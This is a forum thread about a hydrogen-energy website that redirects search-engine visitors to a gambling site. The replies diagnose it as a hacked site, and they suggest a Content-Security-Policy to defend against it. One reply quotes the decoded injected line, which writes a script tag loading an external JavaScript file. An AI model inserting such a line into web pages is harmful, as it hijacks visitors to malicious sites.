百度搜素“氢能源”,出现的“中国氢能源网”,地址是:www.china-hydrogen.org
但是点下去却跳转到某博彩网。
看了下百度的搜索地址为
https://www.baidu.com/link?url=p7cFgSeqnDkVcG7w7KtQSmEPsIjaYXZW7eF8CnBAc_bqPHdGxO6UFFSErEyhHuBC&wd=
如果把 querystring 的 wd 去掉,就可以正常停留在网站内了,看起来应该是网站内被挂了 js 检查 wd 这个参数。
接下来要如何检查呢?
1
gam2046 2018-12-31 18:04:57 +08:00 3
http://www.china-hydrogen.org/ 查看 HTML,第 10 行内容,解码后内容为:
window["document"]["write"]('<script type="text/javascript" src="https://www.cpdas8.com/dd.js"></script>'); 而加入的该 js 很短,该 JS 内容的倒数第二行将网页进行了跳转。 |
2
luminous 2018-12-31 18:20:42 +08:00 via Android
我也见到过这种被黑的站 只有从搜索引擎点进去才跳转菠菜站 黑产真是啥操作都有
|
3
abux1024 2018-12-31 18:21:49 +08:00
这种代码是运营商植入的吗
|
4
mytsing520 2018-12-31 21:56:16 +08:00
@abux1024 是被黑了,不是植入。这种植入对运营商半点好处都没有,相反还会带来巨大风险
|
5
zxq2233 2019-01-01 09:40:50 +08:00
小伙子浏览器没装 Adblock 吧
|
6
weipt 2019-01-01 12:03:34 +08:00
我的网站刚刚有起色的时候被种码,你可以看看你的 webconfig 文件,里面加了如果是各种搜索引擎来的直接跳转到他的域名上。
|
7
laoyuan 2019-01-01 18:08:37 +08:00
因为站长、管理员是不会通过搜索引擎来访问自家网站的
|
10
gam2046 2019-01-01 22:34:27 +08:00
不知道这个网站是否就是你的。这个时候,一方面考验代码的严谨性,另一方面有个比较简单的方法可以,较为的简单的阻止这种代码执行,即使不幸被挂马,也不会影响用户。
在服务端返回的时候(有前置反向代理,则可以在外层代理上设置),加上相对严格的 CSP 即可,比如可以运用这样的策略 "script-src 'self' 'unsafe-inline'; object-src 'self' eval 函数会被直接禁用,而且浏览器只会加载同源的资源,其他的资源都会被阻止。 |